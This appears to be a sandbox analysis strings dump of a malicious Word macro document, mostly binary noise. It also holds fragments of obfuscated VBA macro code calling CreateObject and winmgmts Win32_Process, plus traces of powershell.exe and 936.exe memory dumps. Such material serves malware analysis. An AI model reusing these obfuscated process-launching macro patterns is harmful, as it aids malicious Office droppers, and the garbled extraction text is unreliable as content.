0No ListRR$Z0Balloon TextdCJOJQJ^JaJN/N$Z0Balloon Text CharCJOJQJ^JaJPK![Content_Types].xmlN0EH-J@%|$ULTB l,3;rJB+$G]7OV<a(7IR{pgL=r85v&uQ8CX=$?6NJCFB.'.+YT^e55 _g -;Yl|6^N`?[PK!6_rels/.relsj0}Q%v/C/}(h"O

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

0p#-oh=wt#*(QTXb{N9

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

0Table Normal4

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

0woo&5

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

14:("LbCKUwh7FjZNifav_TThisDocument.Mwbcw5j

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

14lt5q9$dJFV){-kp@:nm'.V

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

1emEEnxTM`kI'MTj+pD.sKC@EA}kusIUSXA0${vemYSKTU;i]LL50#-9?eOU\5u[H\CX@d~o&gH2#y)>^tMW;%!i984 [VCQY-]s=K*1/s`:>j+*$I=A0T&$J+TT, S31oi#'eD[/&-AlFmx[[['[#sH

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

1M0#TtTVY,w `-`h##r9 IRINkK,w,<MFc #$`Ob&nk^6-?2@,xFQ+m;(#`R`8xqc1rQ6/N

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

1TableMacros=VBAdirIRZCT2RjMGj4SbqJsB

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

1{L\vUTM%=L6"'7C s AuQhkeh-mCs[@'*p@EtvPV*(+"~WG#3Q8sH# pyGz7]OlV*,rW.q$>@ j

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

2*x*h'7C@ZKn]WjYbk:[I'W/ 8_EEMP4rP_479

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

23OcS=,.{5%.9-vE

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

26&Fk@Wvmx&Wv|^-Jtv^Yi8knk]nW\()PS d<N1 v5u|UhM]+PzgRE7*|1+#Vu;&o>[_MJ[W(~RL"zh67^4X8+j0j0i=?>Ua

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

2^=V.Z.~Lu7ss<L,AFG^9I-ZkKCI-m<(\2j={ut~TqU%d Det+IQUSM4XNME$c rK}I,k]{+%d@e32{d-!*Ig)iKZ?tamZ^5cC@> g:6>u<.-sgWj7[qKag,i|+cVLH>Z*jz[#n:03U^[UEldnRF$qgX~o46kQ[-l^<R= <7oYErnmWI^8p$@' 5:N>Bt2oDv0yc.i%t4(.Z

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

2^=V.Z.~Lu7ss<Lp#dV^Smvp6Ihi%k{F@ Cv:gS${I$'7kQ.cZ\8I

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

32_Process$BTs:Win"Debug.Print "mfGTzL" + ("711" + ("E47ZQnUt") + "p90fbN" + "546") + "KHDVFUi" + ("FcsAiIJB") + ("mawC4hXT" + "iGQhOi" + "692" + ("rFwpim4") + ("V1Wasr5D" + ("JwtBt9") + "110" + ("13") + ("n_bHiq" + ("773"))))[Lb_Ok47p249hLGm1uHkblrIB419wC66SOdIIzT3bk4zRviDz1TFjdi430ht540oJNYk_EmbhJiN_Ocz4488576tiP9wr11i^Attribute VB_Name = "vawzMw"

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

36#~CreateObject(=inmg" _

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

3C8CDB

Unicode based on Runtime Data (WINWORD.EXE )

42gProgram Files\CommonMicrosoft Shared\OFFICE16\MSO.DLL#G& 16.0 Object LibraryEA@MSF@5s>=SF1Bs3@dD452EE1-E0D8F0A-8-02608C4DP0BB40w

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

4;l3s\\nqj:uMC5c%EAq'$[ssh?kA]fvwS#+d<p2u7]/B9=;#&&J7H<2:3AC_C@#Je{O{4R!h{\ F# ygK

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

4A|W+m-fF9Ma W:v-%U>d^#9JZ;E

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

4F+8JI$rVLvVxNN";fVYx-,JfV<+k>hP!aLfh:HHX WQXt,:JU{,Z BpB)siE4(=U\.O.+x"aMB[F7x"ytK-zz>F>75eo5C9Z%c7%6M29B"N

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

4ttpZ23; s#4Xw@\U{j8FqI:8hk]5l+fwd$ZCIOi9^-/K-GW#K_W3e -`lSUT9tXhw'@6Zkkg3/Nh3,89oh8J]%bZ;|yaiY:E7Wc#q7=Whm[b1Z-:~YCMM6ba6A%.

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

4u151G:vQmfedtrqyq+^Q!d|E{d[Om2K4

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

4XSgcomZ\v6u\-UJ

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

4xwaFKcT)j&Zc8/;Pi~Uno8#9@ A?'yEu$'DK,0yr10T-~bGGm'C/}d<]C*'&NC^mmj5VMEeD53uukph>ec1t\5/Rk^A @'g>-hF\

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

6.1.7600.16385

Unicode based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

6\|#9Ho,C8sGbqN

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

6BwO,|DFp2;x(=DKt7$$2>'^wr+&o.gwA[U\N!p=@@&PVKW|Rk.=>XoKxUpZz\"7B!aq?;rnqTt:*1x# 4`Z}Z7"7ZB`p8v'f,!0]4V[6C.23mrJ}=#L''wzSq^'[h

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

6dC $P/"tGj@U'H66m?Q|{x<?[v7H+Ow:::W~CEQI3j45Ei:`D!

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

6h7.LGKp3+

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

6PO >G{{$8-m

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

7$IJYLLWNx<=6&biw{w.zsMJ>0Xr95;G+Zv]5

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

72geeh.

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

76?B<gkLkGUJ'O'M26;Y5Z5?%=t+<

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

76?B<gkLkGUJ'O'M26;Y5Z5?%=t+I6?B<gkLkGUJ'O'M26;Y5Z5?%=t+IIo#V|V}?Ofzg]J(|~(|~#c3U_z=3SWG*

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

76?B<gkLkGUJ'O'M26;Y5Z5?%=t+IIo#V|V}?Ofzg]J(|~(|~#c3U_z=3SWG*

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

76?B<gkLkGUJ'O'M26;Y5Z5?%~}7w9dqF@xAU ~UsHXaYZ1~|2ynjbkF{xSo/[(5DD5S]oh?QUh?QKH~1O}sLWiXU^EW!Zs&_r,q=O4>#D]TS</V**2GH4KZ9}MjvEdm?J-ATuU[%\'j9{9$}j7??'U-kQt-8o\dI0?p*.fM'u8v:hZQayoSk)~>XE=#/{3sthU=U=%w

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

76ZuTLQmk,r7iZTRw!("U avt1n"4"1348*jI T27DG42H7")

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

7e&V|V}?Ofzg]J(|~(|~#c3U_z=3SWG*

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

7K~aD8@kC`94zpO!J[SNo0A-pi0FZYdd:9hk@kZ

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

8^9e9p9z9

Ansi based on Memory/File Scan (936.exe , 00025715-00002888.00000000.25930.00412000.00000002.mdmp)

8m}f?rjL>&2\U-P,P0S1<p |E`+g,z*lW&^c{/W%3=>gU-Os>Sj]){rOzV'IvD%4Q&)1

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

8PK!g theme/theme/theme1.xmlY?4}O3d=HTwbS.&!,.1$?"[UR0aF0t~{S^&\t$z=!Q@o?_EG2@>GRU1a$N%KjVkUDRKQj/dR*SxMPsJ5$4vq^WCD{>`3REB=UtQy@\.X7<:+&

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

8t]jYOQXQF\d9p,.'v8v]sC?K6^7ld!8C@q,-#9Rmmj5VMEeD53uukpke_m> DU

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

8YWE]LfU+UD9Qz[xknGt]=L{g5~n4_{0UzWo9U*Z~}y]}^(*(H"lwc@b171U-lbQgwo>[_MJ[W(~RL"zh67^4X8+g@0 <`bQ<-t~}||q(DUgu|D||q(}|q(_/w+A_/w)gu|D||q(}|q(_/w+A_/w)gu|D||q(}|q(_/w+A_/w)gu|D||q(}|q(_/w+A_/w)gu|D||q(}|q(_/w+A_/w)gu|D||q(}|q(_/w+A_/w)gu|D||q(}|q(_/w+A_/w)gu|D||q(}|q(_/w+A_/w)gu|D||q(}|q(_/w+A_/w)gu|D||q(}|q(_/w+A_/w)gu|D||q(}|q(_/w+A_/w)gu|D||q(}|q(_/w+A_/w)gu|D||q(}|q(_/w+A_/w)gu|D||q(}|q(_/w+A_/w)gu|D||q(}|q(_/w+A_/w)gu|D||q(}|q(_/w+A_/w)gu|D||q(}|q(_/w+A_/w)gu|D||q(}|q(_/w+A_/w)gu|D||q(}|q(_/w+A_/w)gu|D||q(}|q(_/w+A_/w)gu|D||q(}|q(_/w+A_/w)gu|D|$E$(Vf*}>+fc|E\#_1Vvgjo""""" """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ ""T'=?hVf*}>+fc|E\#_1Vvgjo""""" """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ ""T'=?hVf*}>+fc|E\#_1Vvgjo""""" """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ ""T'=?hVf*}>+fc|E\#_1Vvgjo""""" """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ ""T'=?hVf*}>+fc|E\#_1Vvgjo""""" """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ ""T'=?hVf*}>+fc|E\#_1Vvgjo""""" """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ ""T'=?hVf*}>+fc|E\#_1Vvgjo""""" """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ ""T'=?hVf*}>+fc|E\#_1Vvgjo""""" """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ ""T'=?hVf*}>+fc|E\#_1Vvgjo""""" """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ ""T'=?hVf*}>+fc|E\#_1Vvgjo""""" """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ ""T'=?hVf*}>+fc|E\#_1Vvgjo""""" """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ ""T'=?hVf*}>+fc|E\#_1Vvgjo""""" """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ """ ""T'=?hVf*}>+fc|E\#_1Vvgjo""""" "7|NU)#OUXoh

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

9$+K={Ul*tRhsNAu'kMmGWGP$3Fr4`<M7><-i#wdz*K,Hnl k>"O%}].'"(n08 NiAq4[AhzOyc |}+E_,u4)He6a^Rh*8/61T_p\0FsZFKi::4uz~1

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

9$TMGM4j/

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

9i}}Uku.{IpI$u-P$O$pI{p@!<"^MaqY-"[34rp{`NP[\Anv]#u&rEh%dg9IZUJc7tlg,s s$@8)jb,30I9ix

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

9p d"b$}'S_5;cv#nF\@!8a]inUv#Q^%A vdyK:Km+KIqI(>D@DDD@DDD@EvSsue==ECZ'CFrw-h,Z{kkh&caw5AsQ@-ul2;5<xIAS"YV

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

9p d"GU:dar|c<Mc'$Y

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

9q25NNOf$DOLo&Vu6Z?Y

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

9V4E("sc PmDPK("2S7.aqSho"wqdow vIO wYItd

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

: CONTROL Forms.ComboBox.1 \s CONTROL Forms.ComboBox.1 \s CONTROL Forms.ComboBox.1 \s

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

:+**1~}

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

:A~-uZNCW^-AoztGI

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

;'28k^>A"Uk[%&>H5ys;O }

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

;]%A[gs[

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

;e0+x.-po'4FIpO::j$h{g@8AvvMn_E(pNy9'ApmK[IP1;5w[X9)DOV~O*!\keSdF8frFHN:7B

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

;Iu@u`f-'

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

;nGB9s{8gs\Rsu4lI8m$r<H=_*{v\]Tn0.-k%y h4]&|GC=\2@'``c}/EP

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

;WEcEWSZl\+^C]nlM:y#lN,$9c[X{?aj6FPKY>GA\7i`4`t+cUppll]P 9/7_tryu3n<9i$nzCFm~hn9!>n8FF$dF[YMU\4vick}pcd+SZ5HnH$;Z6'e qe

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

;{IE+LF8YrcoEI-GP)LU]q>/36)3

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

<+(RY

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

<9#2fMmq@{xX[\rVP>.x(_=ZWz2M/UHQ%^g`

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>iii !?AB`biWWW777L#@0(

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

<H y0@+D@o||F\xoB6cRZ7ImGu{emkdF\s{A+I[~LQnTq#I `dk4vPOgXAssy-FM1O:`]bZJHRhxcGL6p!pAA5qw{<t%9"$/%<A+M}!lv-nmmkEp#`%h[=M$6]

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

= C?hv=%[xp{_P<1H0ORBdJE4b$q_6LR7`0O,En7Lib/SePK!kytheme/theme/themeManager.xmlM

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

==V"?E>6

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

=CCXqJ.qiqKXvcH JMtD55@[E=k#3w7\9r^

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

=U`{\`0A ~:zBnuvHc/h+G4uDt6i\'z0cO,`1sZ;1i}j-[4}LS$s8 {w/WtDdwJx^A.y82AqYPQ~dZas:[3\dx{K`tfMpCd=8GKvz(.]XP==dgy5uRvy*,{]j4L6`1%%>3`~gI)`db'p%>

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

>.K:?kHk:}#<F]%4&ncAn{5iPQx".

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

>`YC=H-|`$pdEGI+!

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

? vxv;-

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

?+?0?:?D?^?n?w?

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

?6m]oNKij_4'vfmY!FS4t<{y3dY<r(}7n7MW[tAjcZ"^c#;jYYRK#92O.OH

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

??1type_info@@UAE@XZ

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

??2@YAPAXI@Z

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

??3@YAXPAX@Z

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

??_U@YAPAXI@Z

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

??_V@YAXPAX@Z

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

?__;?,___gq_,9,

Ansi based on Image Processing (screen_0.png)

?___?v?______

Ansi based on Image Processing (screen_10.png)

?________?

Ansi based on Image Processing (screen_10.png)

?QLA1]MX;8x\7S^MKz;NuGew&d.c

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

?terminate@@YAXXZ

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

?ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½

Ansi based on Runtime Data (WINWORD.EXE )

@@@{9998

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

@]9(\!PE

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

@Calibrix

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

@Module1ShSpmfIRt0pLjBVn3ujaIRZCT2Class1v_EwVS8VRjMGj4wSFzhwwBZaojtMzt7hFLKSbqJsBzzfKiRJWU_mYiwBPSNkSw3p5zGQrt93Y9MrGdu6ra_8dZIhYzwzochf8TqzaDzPwSjLDS7SLIw3NFEcQSmtT0iCW3

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

@|C%E

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

@}w7c(EbCA7K

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

[F00000000][T01D51632ACFD6080][O00000000]*C:\

Unicode based on Runtime Data (WINWORD.EXE )

[F00000000][T01D51632ACFFAA70][O00000000]*C:\ATTACHMENT654860I32560.doc

Unicode based on Runtime Data (WINWORD.EXE )

[Host Extender Info]

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

[OH=huifJaZCNr< mnE0!11KQ}%tRCK{%%6Kh&mtF

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

[Workspace]

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

\c/xMEH8B RDebug.Print "btATfrn" + ("312" + ("Ovh_OnUv") + "dla8Hj" + "930") + "onGf6a" + ("Zzr3QU") + ("wHfEb8_" + "F7SEL0" + "762" + ("uTLQmk") + ("r7iZTRw" + ("Uavt1n") + "41" + ("348") + ("jIT27DG" + ("427"))))ame[jj7zBHE580hfwAlVDbH6wFkRjF550sizj4fljdmB2LViAqXnVsPvl0BYk801Zs2ItUPwPY7N19Z3bvKoq959140LbCKUwh750 ! ! !'Debug.Print "VL1_aWm" + ("409" + ("w33kd3") + "XUJmnaF5" + "927") + "L1VTpDZ" + ("S7mnN7w") + ("i62M9lp" + "da5hbq7Z" + "376" + ("LhEQdch") + ("UrnjZVB" + ("tvoQP2") + "197" + ("441") + ("wrziLBQ" + ("56"))))[ljE83Z3792EoTXf3ONDCnCz1584ZISLBTWT1_ZDrYRCUGTwnhBJCzsW5_807DIMNkcz7ojcJFrjiimdp554338CJrkzF364 winmgmts:Win

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

\Q_x"xha?x+XL{KB(IrCF=k~yGA(]6/(:5

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

])jvNIpF4:XuV=TQ64$|FHLiJmkfs%EfkX:gpii+UwM4]WDR2:rlv{m__

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

].TT/{KVHpqO<o*.tZJlo'uy8

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

]F}s?

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

^0XG1"}a0jHxpO~fSLO~+DO?0F>/;^qI+LHzq!V.v_<

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

^jLrkh4=NEDX&n9mDL:nw"zNRV2A9Ki+]z@@X5?

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

^|'-z

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

^|'\_D=w[

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

_+1{_k&VxB<C0.f_(]n)}QE5kE;j-C9#p4Wk}G&wk<]=p r+3F=D*}b1\2tX{{5rh(c5m pxC<{tOv',tW=p~E- :Fucp@h$.uW=97Y"fi?x;`bDGm?2-o'{PQ7C#i^#

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

_?__?_?v?______

Ansi based on Image Processing (screen_0.png)

_?n,,__

Ansi based on Image Processing (screen_10.png)

__0______q__

Ansi based on Image Processing (screen_10.png)

__0____q__

Ansi based on Image Processing (screen_20.png)

______

Ansi based on Image Processing (screen_10.png)

__________

Ansi based on Image Processing (screen_20.png)

________q0_____

Ansi based on Image Processing (screen_10.png)

______q0____

Ansi based on Image Processing (screen_20.png)

___L?

Ansi based on Image Processing (screen_20.png)

__CxxFrameHandler

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

__p__commode

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

__p__fmode

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

__set_app_type

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

__setusermatherr

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A31000.00000020.mdmp)

__SRP_0$__SRP_1>__SRP_4__SRP_5v_EwVS8VwSFzhwwBThisDocument_VBA_PROJECTPROJECTPROJECTwm#"CompObj+(rObjectPool L'_16206540580B

